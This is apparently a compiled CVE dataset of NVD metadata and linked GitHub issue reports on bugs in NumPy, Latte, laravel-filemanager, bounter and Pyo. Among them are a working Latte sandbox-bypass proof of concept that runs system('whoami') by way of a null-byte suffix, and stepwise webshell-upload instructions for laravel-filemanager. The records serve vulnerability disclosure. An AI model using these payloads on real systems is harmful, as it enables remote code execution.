[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/numpy/numpy/issues/18993" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/numpy/numpy/issues/18993" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:numpy:numpy:*:*:*:*:*:*:*:*", "matchCriteriaId": "2EB75A95-68BF-48A9-9E5D-9571C7D25352", "versionEndExcluding": "1.22.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_policy:22.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "4B0C905A-EA99-4B4E-A350-7F6A63CD6EB1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "697" ]
697
https://github.com/numpy/numpy/issues/18993
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "numpy", "numpy" ]
<!-- Please describe the issue in detail here, and fill in the fields below --> ### Reproducing code example: **Snippet**: /* Check for a deprecated Numeric-style typecode */ /* `Uint` has deliberately weird uppercasing */ char *dep_tps[] = {"Bytes", "Datetime64", "Str", "Uint"}; int ndep_tps = sizeof(dep_tps) / sizeof(dep_tps[0]); for (int i = 0; i < ndep_tps; ++i) { char *dep_tp = dep_tps[i]; if (strncmp(type, dep_tp, strlen(dep_tp)) == 0) { ------> '\0' not considered here, should be strlen(dep_tp)+1. (value of "type" may come from external modules) /* Deprecated 2020-06-09, NumPy 1.20 */ if (DEPRECATE("Numeric-style type codes are " "deprecated and will result in " "an error in the future.") < 0) { goto fail; } } } ### Error message: When we run our analysis tool on NumPy, an incomplete comparison problem was reported, see details below: **File**: numpy/core/src/multiarray/descriptor.c **Function**: _convert_from_str (line 1727 : 1740) **Optional call-path**: PyArray_DescrAlignConverter -> _convert_from_any -> _convert_from_str Details in [description](https://github.com/Daybreak2019/IssueReport/blob/master/Numpy/case-9778/9778.png) ### NumPy/Python version information: the main branch of NumPy
Insecure string comparison (incomplete comparison) in _convert_from_str of descriptor.c
https://api.github.com/repos/numpy/numpy/issues/18993/comments
32
2021-05-12T02:04:35Z
2022-08-23T11:45:31Z
https://github.com/numpy/numpy/issues/18993
889,523,180
18,993
2,872
CVE-2021-23803
2021-12-17T20:15:08.287
This affects the package latte/latte before 2.10.6. There is a way to bypass allowFunctions that will affect the security of the application. When the template is set to allow/disallow the use of certain functions, adding control characters (x00-x08) after the function will bypass these restrictions.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nette/latte/commit/227c86eda9a8a6d060ea8501923e768b6d992210" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nette/latte/issues/279" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-PHP-LATTELATTE-1932226" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nette/latte/commit/227c86eda9a8a6d060ea8501923e768b6d992210" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nette/latte/issues/279" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-PHP-LATTELATTE-1932226" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nette:latte:*:*:*:*:*:*:*:*", "matchCriteriaId": "00AE17FB-69B0-4BCB-AD34-D90B054D01A3", "versionEndExcluding": "2.10.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/nette/latte/issues/279
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nette", "latte" ]
Version: 2.10.5 ### Bug Description There is a way to bypass allowFunctions that will affect security. ### Steps To Reproduce ```php <?php error_reporting(0); require 'vendor/autoload.php'; $latte = new Latte\Engine; $policy = new Latte\Sandbox\SecurityPolicy; $policy->allowFilters($policy::ALL); $policy->allowMacros(['if','=']); $policy->allowFunctions(['strlen']); $latte->setPolicy($policy); $latte->setSandboxMode(); $latte->setAutoRefresh(false); file_put_contents('index.latte',"{=system\x00('whoami')}"); $latte->render('index.latte'); ``` This will execute the system function. ### Expected Behavior Should throw an error not allowed by `system` function ### Possible Solution Use rigorous regular expression segmentation, or add more rigorous judgments in `isFunctionAllowed` function
There is a way to bypass allowFunctions
https://api.github.com/repos/nette/latte/issues/279/comments
14
2021-11-21T07:06:14Z
2022-01-08T14:12:17Z
https://github.com/nette/latte/issues/279
1,059,308,710
279
2,873
CVE-2021-23814
2021-12-17T20:15:08.340
This affects the package unisharp/laravel-filemanager from 0.0.0. The upload() function does not sufficiently validate the file type when uploading. An attacker may be able to reproduce the following steps: - Install a package with a web Laravel application. - Navigate to the Upload window - Upload an image file, then capture the request - Edit the request contents with a malicious file (webshell) - Enter the path of file uploaded on URL - Remote Code Execution **Note: Prevention for bad extensions can be done by using a whitelist in the config file(lfm.php). Corresponding document can be found in the [here](https://unisharp.github.io/laravel-filemanager/configfolder-categories).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.5, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "https://github.com/UniSharp/laravel-filemanager/blob/master/src/Controllers/UploadController.php%23L26" }, { "source": "report@snyk.io", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1113#issuecomment-1812092975" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-PHP-UNISHARPLARAVELFILEMANAGER-1567199" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "https://github.com/UniSharp/laravel-filemanager/blob/master/src/Controllers/UploadController.php%23L26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1113#issuecomment-1812092975" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-PHP-UNISHARPLARAVELFILEMANAGER-1567199" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:unisharp:laravel-filemanager:*:*:*:*:*:*:*:*", "matchCriteriaId": "4467027F-A375-40AE-AAC5-2A6CD3BC9598", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "0.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/UniSharp/laravel-filemanager/issues/1113#issuecomment-1812092975
null
github.com
[ "UniSharp", "laravel-filemanager" ]
https://github.com/advisories/GHSA-f8x6-m9f5-ffp8 Surprisingly can't find anything about this in the issues here yet, is this something that's gonna be addressed soon? Thanks a lot!
CVE-2021-23814 Unrestricted Upload of File with Dangerous Type
https://api.github.com/repos/UniSharp/laravel-filemanager/issues/1113/comments
4
2022-02-01T04:52:36Z
2023-11-22T07:43:06Z
https://github.com/UniSharp/laravel-filemanager/issues/1113
1,120,232,695
1,113
2,874
CVE-2021-41495
2021-12-17T20:15:08.477
Null Pointer Dereference vulnerability exists in numpy.sort in NumPy &lt and 1.19 in the PyArray_DescrNew function due to missing return-value validation, which allows attackers to conduct DoS attacks by repetitively creating sort arrays. NOTE: While correct that validation is missing, an error can only occur due to an exhaustion of memory. If the user can exhaust memory, they are already privileged. Further, it should be practically impossible to construct an attack which can target the memory exhaustion to occur at exactly this place
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/numpy/numpy/issues/19038" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/numpy/numpy/issues/19038" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:numpy:numpy:*:*:*:*:*:*:*:*", "matchCriteriaId": "45CF1897-BE04-465C-96D5-CB5D76DF2F88", "versionEndExcluding": null, "versionEndIncluding": "1.19.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/numpy/numpy/issues/19038
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "numpy", "numpy" ]
<!-- Please describe the issue in detail here, and fill in the fields below --> ### Reproducing code example: #### The definition of PyArray_DescrNew ``` NPY_NO_EXPORT PyArray_Descr * PyArray_DescrNew(PyArray_Descr *base) { PyArray_Descr *newdescr = PyObject_New(PyArray_Descr, Py_TYPE(base)); if (newdescr == NULL) { return NULL; ----------------> **point 1** } ......... if (base->c_metadata != NULL) { newdescr->c_metadata = NPY_AUXDATA_CLONE(base->c_metadata); if (newdescr->c_metadata == NULL) { PyErr_NoMemory(); /* TODO: This seems wrong, as the old fields get decref'd? */ Py_DECREF(newdescr); return NULL; ----------------> **point 2** } } ........ if (newdescr->subarray) { newdescr->subarray = PyArray_malloc(sizeof(PyArray_ArrayDescr)); if (newdescr->subarray == NULL) { Py_DECREF(newdescr); return (PyArray_Descr *)PyErr_NoMemory(); ----------------> **point 3** } } ......... return newdescr; } ``` #### Call-site example for PyArray_DescrNew ``` NPY_NO_EXPORT PyArray_Descr * PyArray_DescrNewByteorder(PyArray_Descr *self, char newendian) { PyArray_Descr *new; char endian; new = PyArray_DescrNew(self); endian = new->byteorder; -----> direct read through "new“ ...... } ``` ### Error message: At most call-sites for PyArray_DescrNew, there are no validations of its return, but an invalid address may be returned. [example](https://github.com/Daybreak2019/IssueReport/blob/master/Numpy/case-11471/11471.png) ### NumPy/Python version information: the main branch
Missing return-value validation of the function PyArray_DescrNew
https://api.github.com/repos/numpy/numpy/issues/19038/comments
35
2021-05-19T06:21:52Z
2024-05-05T07:36:09Z
https://github.com/numpy/numpy/issues/19038
895,036,753
19,038
2,875
CVE-2021-41496
2021-12-17T20:15:08.517
Buffer overflow in the array_from_pyobj function of fortranobject.c in NumPy < 1.19, which allows attackers to conduct a Denial of Service attacks by carefully constructing an array with negative values. NOTE: The vendor does not agree this is a vulnerability; the negative dimensions can only be created by an already privileged user (or internally)
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/numpy/numpy/issues/19000" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/numpy/numpy/issues/19000" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:numpy:numpy:*:*:*:*:*:*:*:*", "matchCriteriaId": "341472C4-4DBC-4F3D-B672-5F1C58D5A2C3", "versionEndExcluding": "1.19.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/numpy/numpy/issues/19000
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "numpy", "numpy" ]
<!-- Please describe the issue in detail here, and fill in the fields below --> ### Reproducing code example: **Snippet**: ``` c char mess[200]; if ((intent & F2PY_INTENT_HIDE) || ((intent & F2PY_INTENT_CACHE) && (obj==Py_None)) || ((intent & F2PY_OPTIONAL) && (obj==Py_None)) ) { /* intent(cache), optional, intent(hide) */ if (count_negative_dimensions(rank,dims) > 0) { int i; strcpy(mess, "failed to create intent(cache|hide)|optional array" "-- must have defined dimensions but got ("); ----> 91 chars copied into mess for(i=0;i<rank;++i) sprintf(mess+strlen(mess),"%" NPY_INTP_FMT ",",dims[i]); ----> max of rank is F2PY_MAX_DIMS (40), and all values of dims could be -1. Given the format "%d," ("-1,"), max length of this part could be 40*3=120 + 91 > 200 strcat(mess, ")"); PyErr_SetString(PyExc_ValueError,mess); return NULL; } arr = (PyArrayObject *) PyArray_New(&PyArray_Type, rank, dims, type_num, NULL,NULL,1, !(intent&F2PY_INTENT_C), NULL); if (arr==NULL) return NULL; if (!(intent & F2PY_INTENT_CACHE)) PyArray_FILLWBYTE(arr, 0); return arr; } ``` ### Error message: **File**: numpy/f2py/src/fortranobject.c **Function**: array_from_pyobj (line 724 : 733) **Optional call-path**: External -> fortran_setattr -> array_from_pyobj **Details** in [description](https://github.com/Daybreak2019/IssueReport/blob/master/Numpy/case-10031/10031.png) When we run our analysis tool on NumPy, a few Inappropriate string operations are reported at call sites of function strcpy, sprintf, and strcat in array_from_pyobj. There are no boundary checks at these points despite "mess" seems large enough to ensure the operations safe except for the point shown above. As a suggestion, it is better to replace these functions with strncpy, strncat, and snprintf. ### NumPy/Python version information: the main branch of NumPy
Potential buffer-overflow from string operations in function array_from_pyobj of fortranobject.c
https://api.github.com/repos/numpy/numpy/issues/19000/comments
7
2021-05-13T04:05:51Z
2021-12-20T18:44:25Z
https://github.com/numpy/numpy/issues/19000
890,679,610
19,000
2,876
CVE-2021-41497
2021-12-17T21:15:07.663
Null pointer reference in CMS_Conservative_increment_obj in RaRe-Technologies bounter version 1.01 and 1.10, allows attackers to conduct Denial of Service attacks by inputting a huge width of hash bucket.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/RaRe-Technologies/bounter/issues/47" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/RaRe-Technologies/bounter/issues/47" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rare-technologies:bounter:1.01:*:*:*:*:*:*:*", "matchCriteriaId": "97749749-BC7E-461C-B354-42776E293477", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:rare-technologies:bounter:1.10:*:*:*:*:*:*:*", "matchCriteriaId": "A0F5AFF5-348D-4C38-8318-44DCC8E04EBB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/RaRe-Technologies/bounter/issues/47
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "RaRe-Technologies", "bounter" ]
<!-- If your issue is a usage or a general question, please submit it here instead: - Mailing List: https://groups.google.com/forum/#!forum/gensim --> <!-- Instructions For Filing a Bug: https://github.com/RaRe-Technologies/gensim/blob/develop/CONTRIBUTING.md --> #### Description In CMS_Conservative_init, w is received from Python code. Its size is not validated hence "self->table[i] = (CMS_CELL_TYPE *) calloc(self->width, sizeof(CMS_CELL_TYPE));" may fail , which cause the Null pointer. self->table[i] would be accessed in CMS_Conservative_increment_obj, which make the Python crash down. #### Steps/Code/Corpus to Reproduce ``` static int CMS_VARIANT(_init)(CMS_TYPE *self, PyObject *args, PyObject *kwds) { ......................... for (i = 0; i < self->depth; i++) { self->table[i] = (CMS_CELL_TYPE *) calloc(self->width, sizeof(CMS_CELL_TYPE)); printf ("[%d]self->table[%d] = %p \r\n", i, i, self->table[i]); } ........................... ``` **Optional call-path**: increment -> CMS_Log1024_increment -> CMS_Conservative_increment_obj #### Expected Results when w is set as an arbitrary number, Python can not crash down. #### Actual Results crash #### Versions the main branch <!-- Thanks for contributing! -->
Potential Null pointer access in CMS_Conservative_increment_obj
https://api.github.com/repos/piskvorky/bounter/issues/47/comments
3
2021-05-14T08:12:08Z
2022-01-13T14:22:24Z
https://github.com/piskvorky/bounter/issues/47
891,716,851
47
2,877
CVE-2021-41498
2021-12-17T21:15:07.700
Buffer overflow in ajaxsoundstudio.com Pyo &lt and 1.03 in the Server_jack_init function. which allows attackers to conduct Denial of Service attacks by arbitrary constructing a overlong server name.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/belangeo/pyo/issues/221" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/belangeo/pyo/issues/221" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pyo_project:pyo:1.03:*:*:*:*:*:*:*", "matchCriteriaId": "6A572C53-4ECF-4631-AEA3-F3E41ED3FC45", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/belangeo/pyo/issues/221
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "belangeo", "pyo" ]
### Code snippet ``` Server_jack_init(Server *self) { int i = 0; char client_name[32]; -----------> No initialization char name[16]; ......... strncpy(client_name, self->serverName, 31); -------------> when length of self->serverName is 31, client_name may has no terminator. It is a risk of read-overflow. ......... } ``` ### Description **Function**: Server_jack_init **File**: ad_jack.c **Call-path**: boot (Python) -> Server_boot -> Server_jack_init **WarningType**: read-overflow. Our analysis tool reported a warning at the call-site of strncpy. As client_name is not initialized, it may has no terminator after strncpy hence to cases read-overflow. Also seen in [Details](https://github.com/Daybreak2019/IssueReport/blob/master/Pyo/case-023.png)
Missing a terminator after strncpy in function Server_jack_init, which may cause read-overflow
https://api.github.com/repos/belangeo/pyo/issues/221/comments
4
2021-05-27T06:00:51Z
2021-06-14T00:45:02Z
https://github.com/belangeo/pyo/issues/221
903,252,644
221
2,878